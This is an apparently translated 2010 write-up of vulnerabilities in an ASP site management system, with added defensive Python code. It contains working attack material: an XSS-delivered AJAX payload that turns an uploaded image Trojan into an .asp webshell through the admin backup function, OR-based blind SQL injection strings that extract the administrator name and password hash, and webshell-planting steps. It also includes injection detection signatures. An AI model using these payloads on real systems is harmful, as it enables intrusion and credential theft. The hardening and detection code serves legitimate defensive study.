Using OR to construct a clever SQL injection: analysis of security vulnerabilities in a Zhirui management system - Black Bar Safety Net

ID MYHACK58:62201026745
Type myhack58
Reporter Anonymous (佚名)
Modified 2010-04-17T00:00:00


Title: Using OR to construct a clever SQL injection: analysis of security vulnerabilities in a Zhirui management system. Author: L4nk0r. Source: L4nk0r's Blog. This article was published in the Hackers Handbook magazine, 2009 issue 10, and was later posted by the author on his blog; please keep this notice when reproducing it. L4nk0r: to make reading easier, a file package is provided for download at the end.

Preface: Recently I downloaded a site management system from adrevmedia, found in its source-code section; I assumed that something recommended by adrevmedia should be fairly secure. I downloaded the latest official version, set it up on a local IIS and tested it: it is easy to use, but overall the security is not well done. Since it is the free version, the vendor may have cut some corners. That does not affect our analysis; two aspects are discussed here: cross-site exploitation and SQL injection. In a word: the emphasis is on the idea.

I. The hidden database

Analyzing code usually means working with the database as well (my analysis is of the Access version). Out of habit I opened the database and was surprised to find only a single table, notdown, as shown in Figure 01:

![Figure 01](/Article/UploadPic/2010-4/2010417145543229.jpg)

But a closer look at the code showed that there must be more than this one table, so I wondered whether the others were hidden. It was the first time I had seen this, so I consulted the Access help and found that a data table can carry two further attributes: system object and hidden object. A small knowledge supplement: by default Access does not display system objects or hidden objects, so a table that is a hidden object or a system object is simply not shown. Hiding is easy: in the table design view, right-click the table, choose "Properties" and tick the "Hidden" attribute; after a refresh the table is a hidden object and invisible by default. For a system object, give the table name the prefix usys and it becomes a system object. Either method works. What can be hidden can also be shown again: "Tools" menu -> "Options" -> "View" tab -> under "Show", tick the "System objects" and/or "Hidden objects" check box and press "OK"; all the tables are displayed again. See Figure 02.

![Figure 02](/Article/UploadPic/2010-4/2010417145546250.jpg)

OK, the database can now be used as normal.

II. Deeper use of the cross-site flaw

First look at the vulnerable file /include/PlS.asp. The code displays comments and is included in several files; it is as follows:

<%
IF LePl<>"" then
Dim Author,Content,mycode
Author=Trim(Request.Form("Author"))      ' only leading/trailing spaces are trimmed
Content=Trim(Request.Form("Content"))    ' ditto
mycode = trim(request.form("code"))
if Author="" or Content="" then
    Call Alert ("please fill in the complete re-submission","-1")
end if
if mycode<>Session("getcode") then
    Call Alert ("you enter the CAPTCHA error","-1")
end if
set rs = server.CreateObject ("adodb.recordset")
sql="select * from zhi_rui_E_Pl"
rs.open sql,conn,1,3
rs.addnew
rs("cli")=Request.Form("cli")
rs("Ioid")=request.Form("Inid")
rs("Author")=Author
rs("Content")=Content
------------------------ part of the code omitted -------------------------------
%>

Obviously there is no filtering at all: the input goes straight into the database, so a stored cross-site scripting condition exists. Since the database is in mdb format, the usual tricks for planting a shell in it are useless. So I wondered whether the database could be backed up. Go to the backend and look at the database backup function, shown in Figure 03:

![Figure 03](/Article/UploadPic/2010-4/2010417145546610.jpg)

As you can see, the database path and the backup file name cannot be modified; some friends might stop here. In fact it is still possible: experience tells me that the input box is a hidden field. Look at the file /admin/Admin_Data.asp; the code is as follows:

<td width="81%" bgcolor="#EBF2F9" class="td"><input name=DBpath type=Hidden id="DBpath" value="../DataBase/<%=DataName%>" size="40" /></td>

Seeing type=hidden on this line confirms the guess: any file can be backed up, so getting a shell from the backend is fairly simple. (Planting a shell by backing up the database is more troublesome because the <%loop<% trick has to be bypassed; I will describe the method for bypassing <%loop<% in a later issue.) So how is the cross-site flaw used? Like this: submit an AJAX request so that the database is backed up automatically when the administrator views the comment. However, this database contains the anti-download table, which makes the backup awkward to use, and ordinary users have no way to upload any file; otherwise a Trojan in image format could be uploaded and then backed up automatically through the cross-site AJAX. So this cross-site flaw is not usable in the Access version; in the MSSQL version it could be considered. As a technical discussion I still give the AJAX code. Suppose I can upload a Trojan in image format, upload/2009082150598817.jpg, and now want to back this file up into an asp file through the cross-site flaw. Following the analysis, the code is as follows (save the code below as l4nk0r.js and upload it to your own website):

// Determine the browser type and create an xmlhttp session
if (window.XMLHttpRequest) {
    xmlhttp = new XMLHttpRequest();
} else if (window.ActiveXObject) {
    try {
        xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
    } catch (e) {
        try {
            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
        } catch (e) { }
    }
}
function backup() {
    var postStr = "DBpath=upload/2009082150598817.jpg&bkfolder=../DataBase/bak/&bkDBname=l4nk0r.asp";
    xmlhttp.open("POST", "/admin/Admin_data.asp?action=RestoreData&act=Restore", true);
    xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xmlhttp.send(postStr);
}
backup();
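The request above works only because Admin_Data.asp trusts the client-supplied DBpath as the source of the backup and bkfolder/bkDBname as its destination. The following is an added example, not code from the article or from the management system, of the server-side validation that closes this: every path is anchored to one fixed database directory, the file-name part may carry no directory components, and both source and destination must have a database extension. The use of Python, the directory name and the assumption that the submitted paths are taken relative to the database directory are mine; the three parameter names are the ones in the article's request.

```python
from pathlib import Path

# Added example (not the system's code): validate the three backup parameters
# that the article's Admin_Data.asp accepts from the client before anything is copied.

ALLOWED_EXT = {".mdb"}  # only Access database files may be read or written by the backup


def _inside(base: Path, candidate: Path) -> bool:
    """True if candidate resolves to base itself or to something beneath it."""
    base_r = base.resolve()
    cand_r = candidate.resolve()
    return cand_r == base_r or base_r in cand_r.parents


def validate_backup_request(db_dir, dbpath, bkfolder, bkdbname):
    """Return (ok, reason).

    db_dir   - the only directory a backup may read from or write to (assumed layout)
    dbpath   - source file as submitted in the hidden DBpath field
    bkfolder - destination folder as submitted in bkfolder
    bkdbname - destination file name as submitted in bkDBname
    """
    base = Path(db_dir)

    # source: must stay under db_dir (blocks ../upload/... style traversal) and be a database
    src = base / dbpath
    if not _inside(base, src):
        return False, "source outside database directory"
    if src.suffix.lower() not in ALLOWED_EXT:
        return False, "source is not a database file"

    # destination folder: same containment rule
    dst_dir = base / bkfolder
    if not _inside(base, dst_dir):
        return False, "destination outside database directory"

    # destination name: a bare file name, no separators, and never a server-executable extension
    if not bkdbname or "/" in bkdbname or "\\" in bkdbname or bkdbname in (".", ".."):
        return False, "destination name contains path components"
    if Path(bkdbname).suffix.lower() not in ALLOWED_EXT:
        return False, "destination extension not allowed"

    return True, "ok"


if __name__ == "__main__":
    db = "/srv/site/DataBase"  # constructed path
    print(validate_backup_request(db, "site.mdb", "bak", "site_bak.mdb"))
    # the article's request: image source renamed to .asp -> rejected on two counts
    print(validate_backup_request(db, "../upload/2009082150598817.jpg", "bak", "l4nk0r.asp"))
```

An allow-list on the extension is deliberately used instead of a deny-list of script extensions, because the set of names IIS will execute is larger than most deny-lists remember.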

Then submit it wherever you can post, so that it is triggered when the administrator views the comment. In this system the hole is of little practical value; I just take the opportunity to share the idea. Now to the main subject.

III. Using OR to construct the SQL injection

Vulnerable file: admin/admin_cklogin.asp, the backend login check. It contains an injection vulnerability; the code is as follows:

LoginName=trim(request.form("LoginName"))
LoginPassword=Md5(request.form("LoginPassword"))
mycode = trim(request.form("code"))
set rs = server.createobject("adodb.recordset")
' An obvious injection vulnerability: the variable LoginName is not filtered and goes straight into the executed SQL statement.
' Note that LoginName is enclosed in two single quotes; pay attention to closing them before and after.
sql="select * from zhi_rui_E_manage where AdminName='"&LoginName&"'"
rs.open sql,conn,1,3

if rs.eof then
    response.write "<script language=javascript> alert('the administrator name is incorrect, please re-enter.'); location.replace('Admin_Login.asp');</script>"
    response.end
else
    AdminName=rs("AdminName")
    Password=rs("Password")
    AdminPurview=rs("AdminPurview")
    Working=rs("Working")
    UserName=rs("UserName")
end if

if LoginPassword<>Password then
    response.write "<script language=javascript> alert('admin password incorrect, please re-enter.'); location.replace('Admin_Login.asp');</script>"
    response.end
end if

Well, the injection principle needs no further words, so straight to the exploitation. Looking at the administrator table in the database, by default there is only one administrator, and the administrator user name can be changed. If the default administrator name has not been changed, an AND-based injection can be used; that statement is fairly simple and is not discussed here. But for generality, what if the name has been changed? Nowhere in the front end can any trace of the administrator user name be found. So let us talk about how to inject with OR (a universal-password login does not work here). First, an injection attempt has three possible results:

1. The prompt "the administrator name is incorrect, please re-enter": the injected statement is either not constructed correctly, or constructed correctly but its SQL condition is not satisfied;
2. The prompt "admin password incorrect, please re-enter": the injected statement holds;
3. A direct jump to Admin_Cklogin.asp showing a blank page, which means the password is also correct. This is basically impossible, and there is no need to go to that much trouble.

Now analyze this SQL statement:

sql="select * from zhi_rui_E_manage where AdminName='"&LoginName&"'"

The variable is enclosed in two single quotes, so the closing must be handled; as long as the resulting SQL is valid it is injected properly. So, when injecting with OR, how do we meet these conditions? Like this: make the part before false, make the OR clause that follows (our injected statement) true, and make the final OR, which only serves to close the quotes, false. The overall logic is:

False or True or False -> result True -> password-error prompt
False or False or False -> result False -> user-name-error prompt

With this principle understood, the following SQL statements can be constructed.

(1) 1' or (select count(*) from zhi_rui_E_manage)>2 or '1'='2 (determines whether there are more than 2 administrators)
(2) 1' or (select asc(mid(adminname,1,1)) from zhi_rui_E_manage where id=1)>96 or '1'='2 (determines whether the ASCII code of the first letter of the user name of the administrator with id=1 is greater than 96, i.e. 'a' or later; judging the following positions in turn yields the administrator user name)
(3) 1' or (select asc(mid(password,1,1)) from zhi_rui_E_manage where id=1)>96 or '1'='1 (determines whether the ASCII code of the first character of the MD5 hash of the id=1 administrator's password is greater than 96; judging in turn in the same way yields the 32-character MD5 hash)

If the above succeeds, the return is as shown in Figure 04:

![Figure 04](/Article/UploadPic/2010-4/2010417145547527.jpg)

If it fails, the return is as shown in Figure 05.
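The vulnerable check and a hardened version side by side, as an added example that is not the system's own code: the logic of admin_cklogin.asp rebuilt in Python over an in-memory SQLite database so that both can be run against the statements above. The table and column names follow the article; the rows are constructed test data, and MD5 is kept only because that is what the system stores. SQLite has no asc()/mid(), so the character probe uses unicode(substr()) instead. The parameterised version cannot be steered by the name, compares the hash in constant time and returns one reply whether the name or the password was wrong, which removes the two-reply oracle that the OR construction depends on.

```python
import hashlib
import hmac
import sqlite3

# Added example, not the management system's code. Table/column names from the article;
# rows are constructed test data.

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table zhi_rui_E_manage (id integer primary key, AdminName text, Password text)")
    admins = [("admin", "secret1"), ("ops", "secret2"), ("audit", "secret3")]  # constructed
    for i, (name, pw) in enumerate(admins, start=1):
        conn.execute("insert into zhi_rui_E_manage values (?,?,?)",
                     (i, name, hashlib.md5(pw.encode()).hexdigest()))
    conn.commit()
    return conn


def login_vulnerable(conn, login_name, login_password):
    """Mirrors the ASP: LoginName is spliced into the SQL, and the two failure
    branches answer differently, which is the oracle the OR injection reads."""
    sql = "select * from zhi_rui_E_manage where AdminName='" + login_name + "'"
    row = conn.execute(sql).fetchone()          # (id, AdminName, Password)
    if row is None:
        return "name error"                     # "the administrator name is incorrect"
    if hashlib.md5(login_password.encode()).hexdigest() != row[2]:
        return "password error"                 # "admin password incorrect"
    return "ok"


def login_hardened(conn, login_name, login_password):
    """Parameterised lookup: the submitted name can only ever be compared as a value,
    never change the statement. One reply for both failure cases, constant-time compare."""
    row = conn.execute("select * from zhi_rui_E_manage where AdminName=?", (login_name,)).fetchone()
    stored = row[2] if row else "0" * 32        # dummy so the compare runs either way
    submitted = hashlib.md5(login_password.encode()).hexdigest()
    if row is None or not hmac.compare_digest(submitted, stored):
        return "login failed"
    return "ok"


if __name__ == "__main__":
    db = make_db()
    # statement (1) from the article: with three constructed admins, count(*)>2 holds
    probe = "1' or (select count(*) from zhi_rui_E_manage)>2 or '1'='2"
    print("vulnerable:", login_vulnerable(db, probe, "x"))   # password error -> condition true
    print("hardened:  ", login_hardened(db, probe, "x"))     # login failed -> nothing learned
```

Run stand-alone it prints the two outcomes for statement (1); the difference between "password error" and "name error" in the first function is the single bit the guessing described in the article extracts per request.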


So, patiently guessing by hand yields the administrator name and password. As for getting a shell from the backend, there are many ways; I mention two relatively simple ones:

1. Planting a shell in the site configuration file: in the configuration file, just fill one piece of information in


and then access /include/config.asp directly; that file is the address of the one-line Trojan.

2. Upload a Trojan in image format, then use the local backup function to obtain a webshell.

Of course there are many other good ideas that everyone can test; they are not repeated here.

End: the article ends here; I hope you gained something. For comments or technical discussion, feel free to exchange ideas; my forum ID: L4nk0r.
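The manual guessing described in section III leaves a distinctive trace: one address sends a long run of login attempts whose LoginName carries a comparison threshold, and the replies alternate between the name-error and password-error prompts. The following added example (not part of the article) scores login attempts from a constructed audit log for the signatures present in the article's three statements and raises an alert for an address that sends several such probes within a short window or that receives both replies. The log format, with the submitted LoginName and the outcome recorded, and Python itself are assumptions; the two IP addresses and timestamps are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Added detection example, not from the article. Assumed log line format:
#   ISO-time  client-ip  outcome  LoginName-as-submitted

SIGNATURES = [
    re.compile(r"'\s*or\s*\(\s*select", re.I),   # 1' or (select ...
    re.compile(r"\basc\s*\(\s*mid\s*\(", re.I),  # asc(mid(...)) character extraction (Access)
    re.compile(r"\bcount\s*\(\s*\*\s*\)", re.I), # count(*) size probe
    re.compile(r"or\s*'1'\s*=\s*'[12]", re.I),   # the trailing or '1'='2 / '1'='1 closer
]

# Constructed sample log: one address probing, one legitimate admin mistyping once.
LOG = """\
2010-04-17T10:00:01 203.0.113.5 name_error 1' or (select count(*) from zhi_rui_E_manage)>2 or '1'='2
2010-04-17T10:00:03 203.0.113.5 password_error 1' or (select asc(mid(adminname,1,1)) from zhi_rui_E_manage where id=1)>96 or '1'='2
2010-04-17T10:00:04 203.0.113.5 name_error 1' or (select asc(mid(adminname,1,1)) from zhi_rui_E_manage where id=1)>110 or '1'='2
2010-04-17T10:00:06 203.0.113.5 password_error 1' or (select asc(mid(adminname,1,1)) from zhi_rui_E_manage where id=1)>100 or '1'='2
2010-04-17T10:05:00 198.51.100.7 password_error admin
2010-04-17T10:05:20 198.51.100.7 ok admin
"""


def parse(line):
    ts, ip, outcome, name = line.split(" ", 3)
    return datetime.fromisoformat(ts), ip, outcome, name


def matched_signatures(name):
    """Indices of SIGNATURES that the submitted name matches."""
    return [i for i, rx in enumerate(SIGNATURES) if rx.search(name)]


def analyse(log_text, min_probes=3, window_seconds=60):
    """Return {ip: {"probes", "burst", "signatures", "alert"}} for addresses that sent
    at least one signature-matching name. Legitimate logins never appear."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, outcome, name = parse(line)
        sigs = matched_signatures(name)
        if sigs:
            per_ip[ip].append((ts, outcome, set(sigs)))

    report = {}
    for ip, events in per_ip.items():
        events.sort(key=lambda e: e[0])
        # largest number of probes inside any sliding window: character-by-character
        # extraction needs many rapid requests, a single odd string does not
        burst = 0
        for i, (t0, _, _) in enumerate(events):
            n = sum(1 for t, _, _ in events[i:] if (t - t0).total_seconds() <= window_seconds)
            burst = max(burst, n)
        signatures = set().union(*(e[2] for e in events))
        # both replies observed for injected names means the oracle is being read
        oracle_read = {o for _, o, _ in events} >= {"name_error", "password_error"}
        report[ip] = {
            "probes": len(events),
            "burst": burst,
            "signatures": signatures,
            "alert": burst >= min_probes or oracle_read,
        }
    return report


if __name__ == "__main__":
    for ip, info in analyse(LOG).items():
        print(ip, info)
```

The signature list is intentionally narrow (the exact shapes used in this article) so that the burst and both-replies rules carry the weight; widening it to generic SQL keywords would flag ordinary names containing "or". The same analysis can be fed from any source that records the submitted name, such as a reverse proxy or WAF that logs form bodies for the admin login path.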

Image attachment: ![attachment](/Article/UploadPic/2010-4/2010417145547470.jpg)